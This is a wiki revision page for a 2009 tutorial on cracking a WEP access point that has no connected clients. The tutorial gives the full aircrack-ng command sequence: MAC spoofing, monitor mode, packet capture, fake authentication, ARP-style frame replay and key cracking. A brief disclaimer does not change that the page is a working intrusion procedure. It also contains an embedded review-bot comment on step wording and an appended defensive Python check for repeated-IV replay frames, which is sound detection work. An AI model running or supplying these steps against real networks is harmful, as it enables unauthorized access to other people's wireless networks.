Cracking a clientless wep AP: Difference between revisions
From D3xt3r01.tk
New page: ==WHY== Not all AP's have a client connected ...I'll assume you already have a supported card and the injection is working !!! I'll also assume that you know what you're doing and you're ... |
m →HOW |
||
Line 9: | Line 9: | ||
ifconfig wlan0 down | ifconfig wlan0 down | ||
2) change card mac | 2) change card mac | ||
ifconfig wlan0 hw ether 00:11:22:33:44:55 | ifconfig wlan0 hw ether 00:11:22:33:44:55 up | ||
3) start it in monitor mode | 3) get some access points | ||
iwlist wlan0 scan | |||
4) start it in monitor mode | |||
airmon-ng start wlan0 | airmon-ng start wlan0 | ||
5) start dumping packets | |||
airodump-ng -c channel -w file --bssid ap_mac wlan0 | airodump-ng -c channel -w file --bssid ap_mac wlan0 | ||
6) fake auth | |||
aireplay-ng -1 0 -a ap_mac -h 00:11:22:33:44:55 wlan0 | aireplay-ng -1 0 -a ap_mac -h 00:11:22:33:44:55 wlan0 | ||
7) play some fake packets ( you should see the packets grow fast in the airodump-ng window ) | |||
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b ap_mac -h 00:11:22:33:44:55 wlan0 | aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b ap_mac -h 00:11:22:33:44:55 wlan0 | ||
8) crack it !!! | |||
aircrack-ng file-01.cap | aircrack-ng file-01.cap | ||
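Review bot: the label of step 2 in the new revision no longer matches what the step does, because `up` was appended to the `ifconfig wlan0 hw ether 00:11:22:33:44:55` line while the label still reads "change card mac". Say in the label that the interface is also brought back up, since the newly inserted step 3 (`iwlist wlan0 scan`) runs right after it on an interface that step 1 took down. It would also help to state that `channel` and `ap_mac` in step 5 are placeholders rather than literal arguments.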
Revision as of 17:28, 28 July 2009
WHY
Not all APs have a client connected. I'll assume you already have a supported card and that injection is working! I'll also assume that you know what you're doing and that you're not doing anything illegal! DON'T GO CRACKING your NEIGHBOURS' wifi.
HOW
1) stop the card
airmon-ng stop wlan0
ifconfig wlan0 down
2) change card mac
ifconfig wlan0 hw ether 00:11:22:33:44:55 up
3) get some access points
iwlist wlan0 scan
4) start it in monitor mode
airmon-ng start wlan0
5) start dumping packets
airodump-ng -c channel -w file --bssid ap_mac wlan0
6) fake auth
aireplay-ng -1 0 -a ap_mac -h 00:11:22:33:44:55 wlan0
7) play some fake packets (you should see the packet count grow fast in the airodump-ng window)
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b ap_mac -h 00:11:22:33:44:55 wlan0
8) crack it !!!
aircrack-ng file-01.cap
STUFF
If something goes wrong, you're probably not auth'ed, or the injection doesn't work, or you're too far away from the AP.
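From the defender's side, the injection in step 7 stands out in a capture: the replayed frame carries the same WEP IV every time, while a normal station changes the IV on each frame. The following is an added example, not part of the original page: a Python check over already-parsed frame records, where the record fields, the thresholds and the sample frames are assumptions constructed for illustration.

```python
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"

def find_replay_sources(frames, min_repeats=50, window=1.0):
    """Return {(bssid, src): iv} for stations replaying one WEP frame.

    frames: iterable of dicts with keys ts (seconds), bssid, src, dst,
    to_ds (bool), protected (bool), iv (3-byte hex string). Hypothetical
    record layout; adapt it to whatever your capture parser emits.
    """
    seen = defaultdict(list)  # (bssid, src, iv) -> timestamps
    for f in frames:
        # Frame control 0x0841 (step 7) is a data frame with ToDS and the
        # Protected (WEP) bit set; the destination there is broadcast.
        if f["to_ds"] and f["protected"] and f["dst"].lower() == BROADCAST:
            seen[(f["bssid"].lower(), f["src"].lower(), f["iv"])].append(f["ts"])
    hits = {}
    for (bssid, src, iv), stamps in seen.items():
        stamps.sort()
        # Sliding window: min_repeats frames with one IV within `window` seconds.
        for i in range(len(stamps) - min_repeats + 1):
            if stamps[i + min_repeats - 1] - stamps[i] <= window:
                hits[(bssid, src)] = iv
                break
    return hits

def sample_frames():
    """Constructed sample: one normal station and one replaying station."""
    ap = "02:00:00:00:00:01"  # constructed BSSID
    frames = []
    for n in range(200):
        t = n * 0.005
        # Normal client: fresh IV per frame, broadcast only occasionally.
        frames.append({"ts": t, "bssid": ap, "src": "02:00:00:00:00:0a",
                       "dst": BROADCAST if n % 40 == 0 else ap,
                       "to_ds": True, "protected": True, "iv": f"{n:06x}"})
        # Replaying station (MAC from step 2): same IV on every frame.
        frames.append({"ts": t, "bssid": ap, "src": "00:11:22:33:44:55",
                       "dst": BROADCAST, "to_ds": True, "protected": True,
                       "iv": "a1b2c3"})
    return frames

if __name__ == "__main__":
    for (bssid, src), iv in find_replay_sources(sample_frames()).items():
        print(f"replay suspected: {src} -> {bssid}, repeated IV {iv}")
```

A hit on this check is also a reason to move the network off WEP, since the procedure above needs no connected client to succeed.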